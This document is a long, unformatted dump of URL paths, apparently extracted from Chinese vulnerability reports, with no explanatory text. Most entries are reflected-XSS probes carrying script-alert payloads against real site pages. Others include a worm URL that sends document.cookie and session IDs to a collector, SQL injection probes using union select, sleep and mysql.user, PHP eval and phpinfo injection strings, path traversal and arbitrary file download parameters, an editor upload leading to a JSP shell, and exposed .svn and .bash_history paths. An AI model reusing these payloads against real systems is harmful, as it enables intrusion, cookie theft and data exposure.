/list/category/?page=7&categoryId=%22%3E%3Cscript%3Ealert%289419719%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=3&categoryId=1318&name=%22%3E%3Cscript%3Ealert%283531134%29%3B%3C/script%3E /list/category/?page=6&categoryId=%22%3E%3Cscript%3Ealert%289419719%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=8&categoryId=%22%3E%3Cscript%3Ealert%286201025%29%3B%3C/script%3E&name=上网本·3G笔记本 
/list/nodeIdandCategory/?page=3&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%283814536%29%3B%3C/script%3E&name=资讯 /list/nodeIdandCategory/?page=1&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%281199640%29%3B%3C/script%3E /list/nodeIdandCategory/?page=5&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%289711890%29%3B%3C/script%3E&name=资讯 /list/category/?page=5&categoryId=1318&name=%22%3E%3Cscript%3Ealert%284969587%29%3B%3C/script%3E /list/nodeIdandCategory/?page=8&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%280327766%29%3B%3C/script%3E&name=资讯 /list/category/?page=9&categoryId=1318&name=%22%3E%3Cscript%3Ealert%285045779%29%3B%3C/script%3E /list/nodeIdandCategory/?page=6&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%284423786%29%3B%3C/script%3E&name=资讯 /list/category/?page=7&categoryId=1318&name=%22%3E%3Cscript%3Ealert%287734753%29%3B%3C/script%3E /list/category/?page=4&categoryId=1318&name=%22%3E%3Cscript%3Ealert%286595389%29%3B%3C/script%3E /list/nodeIdandCategory/?page=7&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%285713857%29%3B%3C/script%3E&name=资讯 /list/nodeIdandCategory/?page=2&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%286236611%29%3B%3C/script%3E&name=资讯 /list/category/?page=6&categoryId=1318&name=%22%3E%3Cscript%3Ealert%282507508%29%3B%3C/script%3E /list/nodeIdandCategory/?page=4&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%288829450%29%3B%3C/script%3E&name=资讯 /list/category/?page=8&categoryId=1318&name=%22%3E%3Cscript%3Ealert%285713857%29%3B%3C/script%3E /list/nodeIdandCategory/?page=9&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%288393646%29%3B%3C/script%3E&name=资讯 /list/nodelevel2andCategory/?page=1&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%287912834%29%3B%3C/script%3E&name=评测 
/list/nodeIdandCategory/?page=5&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%285287936%29%3B%3C/script%3E /list/nodeIdandCategory/?page=3&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%287912834%29%3B%3C/script%3E /list/nodeIdandCategory/?page=8&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%281745332%29%3B%3C/script%3E /list/nodeIdandCategory/?page=6&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%283272209%29%3B%3C/script%3E /list/nodeIdandCategory/?page=7&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%282794155%29%3B%3C/script%3E /list/nodeIdandCategory/?page=2&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%280728708%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=2&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%287853894%29%3B%3C/script%3E&name=评测 /list/nodeIdandCategory/?page=9&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%285024590%29%3B%3C/script%3E /list/nodeIdandCategory/?page=4&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%282627992%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=1&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%283118875%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=2&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%287697834%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=3&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%283663536%29%3B%3C/script%3E&name=评测 /list/nodelevel2andCategory/?page=5&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%285417773%29%3B%3C/script%3E&name=评测 /list/nodelevel2andCategory/?page=4&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%286561767%29%3B%3C/script%3E&name=评测 /list/nodelevel2andCategory/?page=3&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%288134578%29%3B%3C/script%3E 
/list/nodelevel2andCategory/?page=6&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%287316208%29%3B%3C/script%3E&name=评测 /list/nodelevel2andCategory/?page=7&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%281158619%29%3B%3C/script%3E&name=评测 /oa/news/?page=2&categoryId=1390&name=%22%3E%3Cscript%3Ealert%285216206%29%3B%3C/script%3E /oa/news/?page=1&categoryId=1390&name=%22%3E%3Cscript%3Ealert%285216206%29%3B%3C/script%3E /oa/news/?page=5&categoryId=1390&name=%22%3E%3Cscript%3Ealert%281158619%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=9&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%280968064%29%3B%3C/script%3E&name=评测 /oa/news/?page=6&categoryId=1390&name=%22%3E%3Cscript%3Ealert%283783416%29%3B%3C/script%3E /oa/news/?page=8&categoryId=1390&name=%22%3E%3Cscript%3Ealert%283783416%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=5&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%287900657%29%3B%3C/script%3E /oa/news/?page=4&categoryId=1390&name=%22%3E%3Cscript%3Ealert%281712741%29%3B%3C/script%3E /oa/news/?page=3&categoryId=1390&name=%22%3E%3Cscript%3Ealert%286553212%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=8&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%283901788%29%3B%3C/script%3E&name=评测 /list/nodelevel2andCategory/?page=4&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%286553212%29%3B%3C/script%3E /oa/news/?page=7&categoryId=1390&name=%22%3E%3Cscript%3Ealert%283901788%29%3B%3C/script%3E /oa/news/?page=9&categoryId=1390&name=%22%3E%3Cscript%3Ealert%281396990%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=6&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%284567763%29%3B%3C/script%3E /oa/topic/?page=1&nodeId=1084&nodeId1=1068&nodeId2=%22%3E%3Cscript%3Ealert%288208562%29%3B%3C/script%3E&name=专题 /oa/topic/?page=2&nodeId=1084&nodeId1=1068&nodeId2=%22%3E%3Cscript%3Ealert%280414162%29%3B%3C/script%3E&name=专题 
/list/nodelevel2andCategory/?page=9&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%281559259%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=7&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%288208562%29%3B%3C/script%3E /6.php?op=d&oby=n&cID=6&bID=0&pr=0&t1=0&t2=0&bigCID= /oa/topic/?page=1&nodeId=1084&nodeId1=1068&nodeId2=&name=%22%3E%3Cscript%3Ealert%288580820%29%3B%3C/script%3E /oa/topic/?page=2&nodeId=1084&nodeId1=1068&nodeId2=&name=%22%3E%3Cscript%3Ealert%286519119%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=8&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%284483179%29%3B%3C/script%3E /netdiy/cgfa/?page=2&categoryId=1492&nodeId=526&name=%22%3E%3Cscript%3Ealert%287947574%29%3B%3C/script%3E /netdiy/cgfa/?page=1&categoryId=1492&nodeId=526&name=%22%3E%3Cscript%3Ealert%287991562%29%3B%3C/script%3E /printer/complexlist/index.php?categoryId=1390&typeId=105&name=%22%3E%3Cscript%3Ealert%289181646%29%3B%3C/script%3E /list/nodelevel2/?page=3&nodeIdLevel2=%22%3E%3Cscript%3Ealert%284068120%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=1&nodeIdLevel2=%22%3E%3Cscript%3Ealert%286793114%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=7&nodeIdLevel2=%22%3E%3Cscript%3Ealert%280371727%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=8&nodeIdLevel2=%22%3E%3Cscript%3Ealert%288908135%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=5&nodeIdLevel2=%22%3E%3Cscript%3Ealert%280935806%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=6&nodeIdLevel2=%22%3E%3Cscript%3Ealert%286249206%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=2&nodeIdLevel2=%22%3E%3Cscript%3Ealert%289364050%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=4&nodeIdLevel2=%22%3E%3Cscript%3Ealert%282605810%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=9&nodeIdLevel2=%22%3E%3Cscript%3Ealert%281125890%29%3B%3C/script%3E&name=整机 /oa/printscroll/list/?page=2&categoryId=105&name=%22%3E%3Cscript%3Ealert%285486687%29%3B%3C/script%3E 
/oa/printscroll/list/?page=4&categoryId=105&name=%22%3E%3Cscript%3Ealert%282017422%29%3B%3C/script%3E /oa/printscroll/list/?page=6&categoryId=105&name=%22%3E%3Cscript%3Ealert%280557256%29%3B%3C/script%3E /list/nodelevel2/?page=1&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%285213121%29%3B%3C/script%3E /oa/printscroll/list/?page=5&categoryId=105&name=%22%3E%3Cscript%3Ealert%286369119%29%3B%3C/script%3E /list/nodelevel2/?page=5&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%286369119%29%3B%3C/script%3E /list/nodelevel2/?page=8&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%282780518%29%3B%3C/script%3E /oa/printscroll/list/?page=3&categoryId=105&name=%22%3E%3Cscript%3Ealert%289007323%29%3B%3C/script%3E /list/nodelevel2/?page=3&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%286369119%29%3B%3C/script%3E /list/nodelevel2/?page=2&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%286932305%29%3B%3C/script%3E /oa/printscroll/list/?page=1&categoryId=105&name=%22%3E%3Cscript%3Ealert%286932305%29%3B%3C/script%3E /list/nodelevel2/?page=7&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%282725605%29%3B%3C/script%3E /oa/printscroll/list/?page=7&categoryId=105&name=%22%3E%3Cscript%3Ealert%287077311%29%3B%3C/script%3E /list/nodelevel2/?page=6&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%280764242%29%3B%3C/script%3E /list/nodelevel2/?page=4&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%283870622%29%3B%3C/script%3E /oa/printscroll/list/?page=8&categoryId=105&name=%22%3E%3Cscript%3Ealert%289922749%29%3B%3C/script%3E /oa/printscroll/list/?page=9&categoryId=105&name=%22%3E%3Cscript%3Ealert%286105773%29%3B%3C/script%3E /printer/printer/?page=1&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%284679923%29%3B%3C/script%3E /printer/printer/?page=2&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%286225687%29%3B%3C/script%3E /printer/printer/?page=3&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%280068185%29%3B%3C/script%3E 
/4.php?op=d&oby=n&cID=4&bID=0&pr=0&t1=0&t2=0&t3=0&bigCID= /printer/printer/?page=6&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%286594645%29%3B%3C/script%3E /printer/printer/?page=7&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%283004193%29%3B%3C/script%3E /printer/printer/?page=8&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%283139281%29%3B%3C/script%3E /printer/scrollplot/list/?page=3&categoryId=104&name=%22%3E%3Cscript%3Ealert%288307235%29%3B%3C/script%3E /printer/scrollplot/list/?page=2&categoryId=104&name=%22%3E%3Cscript%3Ealert%286881304%29%3B%3C/script%3E /printer/scrollplot/list/?page=1&categoryId=104&name=%22%3E%3Cscript%3Ealert%281758995%29%3B%3C/script%3E /printer/scrollplot/list/?page=4&categoryId=104&name=%22%3E%3Cscript%3Ealert%282728770%29%3B%3C/script%3E /printer/printer/?page=4&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%284429876%29%3B%3C/script%3E /oa/category/?page=1&categoryId=165&name=%22%3E%3Cscript%3Ealert%288535585%29%3B%3C/script%3E /printer/scrollplot/list/?page=6&categoryId=104&name=%22%3E%3Cscript%3Ealert%288535585%29%3B%3C/script%3E /printer/scrollplot/list/?page=7&categoryId=104&name=%22%3E%3Cscript%3Ealert%283948748%29%3B%3C/script%3E /oa/category/?page=2&categoryId=165&name=%22%3E%3Cscript%3Ealert%282467172%29%3B%3C/script%3E /oa/category/?page=3&categoryId=165&name=%22%3E%3Cscript%3Ealert%287197618%29%3B%3C/script%3E /printer/scrollplot/list/?page=8&categoryId=104&name=%22%3E%3Cscript%3Ealert%286619854%29%3B%3C/script%3E /printer/scrollplot/list/?page=9&categoryId=104&name=%22%3E%3Cscript%3Ealert%287763847%29%3B%3C/script%3E /printer/scrollplot/list/?page=5&categoryId=104&name=%22%3E%3Cscript%3Ealert%282313591%29%3B%3C/script%3E /printer/printer/?page=9&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%284557157%29%3B%3C/script%3E /projector/complexlist/index.php?categoryId=1390&typeId=119&name=%22%3E%3Cscript%3Ealert%287327032%29%3B%3C/script%3E 
/list/nodelevel2/?page=9&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%289602106%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=2&categoryId=119&name=%22%3E%3Cscript%3Ealert%282650345%29%3B%3C/script%3E /printer/printer/?page=5&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%280697323%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=3&categoryId=119&name=%22%3E%3Cscript%3Ealert%289738343%29%3B%3C/script%3E /netdiy/complexlist/index.php?categoryId=1390&typeId=46&name=%22%3E%3Cscript%3Ealert%280697323%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=4&categoryId=119&name=%22%3E%3Cscript%3Ealert%288111164%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=7&categoryId=119&name=%22%3E%3Cscript%3Ealert%282589580%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=1&categoryId=119&name=%22%3E%3Cscript%3Ealert%281160910%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=9&categoryId=119&name=%22%3E%3Cscript%3Ealert%284797974%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=8&categoryId=119&name=%22%3E%3Cscript%3Ealert%285831619%29%3B%3C/script%3E /printer/news/?page=3&categoryId=1390&name=%22%3E%3Cscript%3Ealert%289093758%29%3B%3C/script%3E /netdiy/router/list/?page=1&categoryId=46&nodeId=525&name=%22%3E%3Cscript%3Ealert%281963633%29%3B%3C/script%3E /netdiy/router/list/?page=3&categoryId=46&nodeId=525&name=%22%3E%3Cscript%3Ealert%281086207%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=6&categoryId=119&name=%22%3E%3Cscript%3Ealert%285540144%29%3B%3C/script%3E /printer/news/?page=6&categoryId=1390&name=%22%3E%3Cscript%3Ealert%289823184%29%3B%3C/script%3E /printer/news/?page=4&categoryId=1390&name=%22%3E%3Cscript%3Ealert%289472807%29%3B%3C/script%3E /printer/news/?page=5&categoryId=1390&name=%22%3E%3Cscript%3Ealert%282526189%29%3B%3C/script%3E /netdiy/router/list/?page=2&categoryId=46&nodeId=525&name=%22%3E%3Cscript%3Ealert%288885216%29%3B%3C/script%3E 
/printer/news/?page=2&categoryId=1390&name=%22%3E%3Cscript%3Ealert%289366117%29%3B%3C/script%3E /printer/news/?page=7&categoryId=1390&name=%22%3E%3Cscript%3Ealert%284101048%29%3B%3C/script%3E /printer/news/?page=9&categoryId=1390&name=%22%3E%3Cscript%3Ealert%285824625%29%3B%3C/script%3E /printer/news/?page=1&categoryId=1390&name=%22%3E%3Cscript%3Ealert%285824625%29%3B%3C/script%3E /printer/news/?page=8&categoryId=1390&name=%22%3E%3Cscript%3Ealert%283762807%29%3B%3C/script%3E /oa/complexlist/?page=2&categoryId=1390&typeId=105&name=%22%3E%3Cscript%3Ealert%284092575%29%3B%3C/script%3E /oa/printscroll/?page=2&categoryId=155,156,158,160,116&name=%22%3E%3Cscript%3Ealert%288331335%29%3B%3C/script%3E /2007/admin/ /2007/manage/ /2007/manage/ /corpCenter/admin/ /corpCenter/admin/login.asp /2007/upload.php /viewthread.php?tid=2613766 /default/pwdResetRequestByEmail.do?uid=1000244181&code=9qxHvn7L /tool/qqworm.js /bugtest/qqworm.php?sid="+EQQ.getPsessionid()+"&cid="+EQQ.Model.ChatMsg.getClientidFromRpc()+"&cookie="+encodeURIComponent(document.cookie) /channel/get_online_buddies2?clientid=".$clientid."&psessionid=".$psessionid,"GET /proxy.html?v=20110331002&callback=1&id=2 /channel/send_buddy_msg2","POST /proxy.html?v=20110331002&callback=1&id=2 /subread.php?sid=1094 /subread.php?sid=1094%20and%201=1 /subread.php?sid=1094%20and%201=2 /bonus.php?subject=%22;%3C/script%3E%3Cscript%3Ealert%28301%29;%3C/script%3E& /cms/ /cms/editor/eWebEditor /bjiaportal/ /bjiaportal/wafplatform/portletmanage.do /bjiaportal/wafplatform/portletmanage.do?funcid=showGroupTree /front/info/information_download.jsp?FileName=100232012576180.pdf&name=%B9%D8%D3%DA%BE%AF%CC%E8%BC%D9%C3%B0%CA%A1%B7%A2%D5%B9%B8%C4%B8%EF%CE%AF%C3%FB%D2%E5%BD%F8%D0%D0%D5%A9%C6%AD%B5%C4%CD%A8%D6%AA.pdf /hyzq/ghongyuan/HBdownload.jsp / https://passport.youtx.com/user/regist/ /ztc/index.php/m/a/p/${@phpinfo() /ztc/index.php/m/a/p/${@phpinfo() /index.php/Public/login/p/${@phpinfo() /itoperation/Main/Login.aspx 
/nq/mc/1_0_0/us/pim/userstatus_2.swf?url=http://www.baidu.com&callback=function(){alert(0)}() /pb/webplayer/0.9.32/flash/swfproxy.swf?onLoad=alert%280%29 /.svn/entries /phpinfo.php /info.php /info.php /upload/ / /prws/display.aspx?transtr=420000A1A7A17AA18A37A29&newsid=2635 /portal/ /test.php?c='+document.cookie// /test.php?c='+document.cookie// /topic/%E7%94%B5%E5%BD%B1\r\n /follow /people/yolfilm/search?pq=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&type=all /search?q=%22/%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E /news/notice_view.php?id=31 /news/ccbnews_view.php?id=14 /viewthread.php?tid=40986&pid=753324&page=1&extra=page%3D1#pid753324 /account/password.php?act=step1_1&sess=37RH%2FtIcJ10k6yDePpel4TkSy4qjayXDn2VWybxgyns%3D /QuestionDetail.aspx?wID=201206202147245 /share/share.php?url=http://1 www.Xhm1n9.com\\a\\b\\x.js' /echo/eclipse/viewas.asp?id=20'%20and%20@@version=1-- /prog/wapsite/sports/data/account.php?match_id=48135%20and%201=2&league_type_id=7 /prog/wapsite/sports/data/account.php?match_id=48135%20and%201=1&league_type_id=7 /prog/wapsite/sports/data/account.php?match_id=48135%20and%20sleep%28100%29&league_type_id=7 / / /view/c03ec960f5335a8102d22012.html / /list.php?id=64839 /list.php?id=64839 /list.php?id=64839 //space.php?uid=6843194&do=blog&id=289343 /cn/searchresult.jsp?keywords=x&srchfield=%28case%20when%281=1%29%20then%20topic%20else%20content%20end%29&x=52&y=3 /cn/searchresult.jsp?keywords=x&srchfield=%28case%20when%281=2%29%20then%20topic%20else%20content%20end%29&x=52&y=3 /cn/searchresult.jsp?keywords=x&srchfield=%28case%20when%28exists%28select%20*%20from%20mysql.user%29%29%20then%20topic%20else%20content%20end%29&x=52&y=3 /index.php/module/action/param1/${@eval%28$_POST[301]%29 www.czvision.com.cn /search?q=%22+onmouseover%3Dalert%28%2Fxss%2F%29+s www.lpboke.com www.lpboke.com /?product-gnotify /?product-gnotify /themes/文件名称/你的木马名称 /emall/SNOrderCenterLifeDetailView?orderId=747254 /js/gome/.svn/entries /js/widget/.svn/entries 
/AboutUs/NewsLook.php?id=32 /AboutUs/NewsLook.php?id=32 /manager/Default.php /cyportal1.3/template/site00_article_01.jsp?parent_id=402881f9286b086c01286b2fc68e0037&parentType=0&a1b2cc=7xaac&article_id=297edff731cc94fe0135c32e2ba05334 /cyportal1.3/处登陆管理员账户,但是威胁不大,只能修改管理员密码和个人信息。 /app/logo_2010/singlework.php?id=FTC20149 /?m=news&id=152 /?m=cosPlay&id=954 /?action=subscribeinfo&id=46 Object(Db_MysqlClass)- /www/wwwroot/fahao2.07073.com/lib/db/mysqlclass.php Object(Db_MysqlClass)- /www/wwwroot/fahao2.07073.com/lib/db/mysqlclass.php Object(Db_MysqlClass)- /www/wwwroot/fahao2.07073.com/app/controller/index.php Object(Controller_Index)- /www/wwwroot/fahao2.07073.com/lib/dispatcher.php Object(dispatcher)- /www/wwwroot/fahao2.07073.com/lib/dispatcher.php Object(dispatcher)- /www/wwwroot/fahao2.07073.com/www/index.php /?m=news&id=264 /downit.php?id=58038 /comment/add /question/20305009?nr=1¬i_id=20220307 /search.action /singer/album.php?zid=168845&zname[$wooyun]=1 /index.action /im5/login/login.action?t=1340348627348 /i?ct=6&bt=1&tn=baidudetaillost&isign=%22%2balert('wooyun')%2b%22&tsign=690493407,2670508243 /i?ct=7&bt=3&tn=baiduimgdata&isign="+alert('wooyun')+ /app/news/show.php?id=3156 /special/qzone/info/_0.html /special/vip/info/_0.html /Team/index/ /resin-doc/examples/quercus-module/viewfile?file=hello.php /resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml channel.3g.youku.com/webapps/resin-doc/examples/quercus-module/ /pub/submit/createmusic?albumname=Sirens&albumpic1=http://t.cn/z&albumuserpic2=http://t.cn/z&content=aaaaaa&from=ting&private=0&private1=0&qing_request_source=&songid=1&songname=bbbb&songuname=cc&tags[]=dd&url= http://mail.wo.com.cn/mail/login.action /index.action /cyportal/downloadtag.jsp?fileName=*.*&filePath=*/*.* /cyportal.1/downloadtag.jsp?fileName=*.*&filePath=*/*.* /cyportal1.3/downloadtag.jsp?fileName=*.*&filePath=*/*.* /emall/Search?searchKeywords=%3C/title%3E%3Cembed/src=//tmxk.org%3E 
/zhishitang/qa/answerInit.action?flag=0&artID=341908 /mibao/controller/mob/index.jsp /post/2012-06-23/40028420636 /fcg-bin/cgi_friend_gain_leidou.fcg?userid= house365.com txt / /ids/admin/login.jsp /index.action /Index.aspx?pclass=%25u5730%25u57DF&attributeID=184%7C234%7C229%7C229%7C236&key=%7C-%7CBOSS%7C%7C%&cclass=BOSS&type=guaiwu&GameCateID=94%7C94%7C94%7C94%7C94 /ptr/spells.php?c=9 /ptr/spells.php?c=9 www.un.org.cn www.un.org.cn /media/player.swf?debug=function(){alert(/YU/) /76165512_d.html /login-share/logout/logout.action /login-share/logout/logout.action /Include/Api/admin.php /common/images/.svn/entries /.bash_history www.changdu www.chaohu www.chifeng www.chizhou www.chongzuo www.chuzhou www.cq www.dalian www.daqing www.daxinganling www.dongying www.eerduosi www.enshi www.ezhou www.fangchenggang www.fj www.futian www.fuyang www.fuzhou www.ganzhou www.guigang www.guilin www.gx www.ha www.haerbin www.haikou www.hangzhou www.hanzhong www.hebi www.hebi www.hechi www.hegang www.heihe www.henan www.heze www.hezhou www.hlj www.huaibei www.huainan www.huanggang www.huangshi www.hubei www.huhehaote www.hulunbeier www.huzhou www.jiamusi www.jian www.jianghanyoutian www.jiaozuo www.jiaxing www.jinan www.jingdezhen www.jingmen www.jingzhou www.jinhua www.jining www.jiujiang www.jixi www.jiyuan www.js www.jx www.kaifeng www.kaifeng www.laibin www.laibin www.lasa www.liaocheng www.linyi www.linzhi www.liuzhou www.ln www.longyan www.luan www.luohe www.luoyang www.maanshan www.mudanjiang www.nanchang www.nanning www.nanping www.nanyang www.naqu www.ningbo www.ningde www.nmg www.nx www.pingdingshan www.pingxiang www.putian www.puyang www.qh www.qianjiang www.qinghai www.qinzhou www.qiqihaer www.qitaihe www.quanzhou www.quzhou www.rika www.rikaze www.sanmenxia www.sanming www.sanya www.sh www.shangluo www.shangqiu www.shangrao www.shannan www.shaoxing www.shennongjia www.shenyang www.shiyan www.shuangyashan www.suihua www.suizhou www.suzhou www.taian www.taizhou 
www.tianmen www.tj www.tongchuan www.tongliao www.tongling www.weifang www.weinan www.wenzhou www.wuhai www.wuhan www.wuhu www.wulanchabu www.wulumuqi www.wuzhou www.xiamen www.xian www.xiangan www.xiangfan www.xiangyang www.xianning www.xiantao www.xianyang www.xiaogan www.xilinguole www.xingan www.xinxiang www.xinyang www.xinyu www.xjakesu www.xjaletai www.xjbazhou www.xjbozhou www.xjchangji www.xjhami www.xjhetian www.xjkashi www.xjkelamayi www.xjkezhou www.xjshihezi www.xjtacheng www.xjtulufan www.xjwulumuqi www.xjyili www.xuancheng www.xuchang www.xuchang www.xz www.yanan www.yangling www.yantai www.yichang www.yichun www.yichun www.yingtan www.yn www.yulin www.yulin www.yulin www.zaozhuang www.zhangzhou www.zz-police.com www.zhengzhou www.zhoukou www.zhoukou www.zhoushan www.zhumadian www.zhumadian www.zibo www.zj www.zj /crossdomain.xml /news/newslist/?Page[]=1&submit=1 /index.action /index.php /Admin/Article/FileLoad.aspx?FileName=%E9%BB%91%E5%8D%AB%E7%A7%91%E5%8F%91%E3%80%942012%E3%80%95120%E5%8F%B7.doc&URL=96b3346e-3648-410d-8a87-fefcc25a252a.doc /downLoad.jsp?fileName=help.doc /cn2/manage/mobile/active_sms_ajax?mobile_number=xxxxxxxxxxx&flow_type=dna /jsp/download.jsp?filename=iPASS%CA%B9%D3%C3%CA%D6%B2%E1.doc /m /cgi-bin/loginpage?%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26"/ http://222.240.193.172/login.aspx /Shop/ShoppingResult.aspx?orderid=83LST96M00DKZLC0,字符型注入啊~ /ReadNews.asp?NewsID=13358 noxss("*//*");xss:ex/*gg*//*/*/pression(if(window.x!=1){alert(document.cookie);window.x=1;}) /user/settings/editprofile.asp /searchresult.jsp?keywords=xxx&srchfield=topic=0x7c /searchresult.jsp?keywords=xxx&srchfield=topic=0x7c /searchresult.jsp?keywords=xxx&srchfield=topic=0x7c /user/home/ /user/profile/ /neworder/confirm_address/ 
/app/updateUserValidate?type=pwd&email=hello@gmail.com&id=641483319f5dbb10dc20e4c2aac6eab9&num=1340620118434 /music/musicHome.action /login-share/logout/logout.action /login-share/logout/logout.action /mhzx/mzsendcode/insertGroup!list.action /fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /UserFiles/Image/test.jsp /member/loginAction.do /thread-571-1-1.html。 /Shop/ShoppingResult.aspx?orderid=83LST96M00DKZLC0%27and%201=2%20union%20select%201,2,3,4,5,schema_name,7,8,9,10,11,12%20from%20information_schema.schemata%20limit%201,1%23 /manual/ /manual/index.php /manual/ko/index.php /manual/en/index.php /manual/de/index.php /zh-CN /adduser/chkuuid.asp?uuid=1 www.zyccb.com /app/my/docin/checkOldPwd?password=XXXXXXXXXXX返回的结果来判断用户输入的密码是否为真,ture和false,这个过程存在一定缺陷,在拿到用户COOKIES的情况下,利用穷举或者密码库,很容易就可以测试出用户的原密码。 /app/my/docin/password?fn=update /app/my/docin/password?fn=update /app/my/docin/addConcernUser /app/my/docin/addConcernUser /jsp_cn/userBlog/userdoc/updateaboutme.jsp?content=[在这里输入你想修改的签名 /app/my/docin/reset?newPwd=123456&newPwdAgain=123456 none"/ /infogm.php?cid=&gid=48157 /infogt.php?cid=&gid=48157 /infogm.php?cid=&gid=48157 /infogm.php?cid=&gid=48157 /infogm.php?cid=&gid=48157 /tdxlsqxt/stuClient.shtml?action=afficheDetail&afficheId=61 /CMS/Login.aspx /1.php /account/ajax/add/address /account/addresses http://hbp.happigo.com/ /supplierSeminar/images/login.gif/1.php /newsView.php?sid=&cnid=1456639%20and%20sleep(12)&chid=1_14_3&coid=1_14_3_1&wv=2&v=l&return=channel&fromid=&uc_param_str=dnup /newsView.php?sid=&cnid=1456639 /question/19550238/answer/12202028,自然要看看这个输入地方是否 /question/19555227 /info.php /gpsback/index.action /index.php?m=attachment&c=attachments&a=album_dir&dir=.../../.../.../// /index.php?m=attachment&c=attachments&a=album_load&t=1&dosubmit=true&info[where]=sdfdsss 
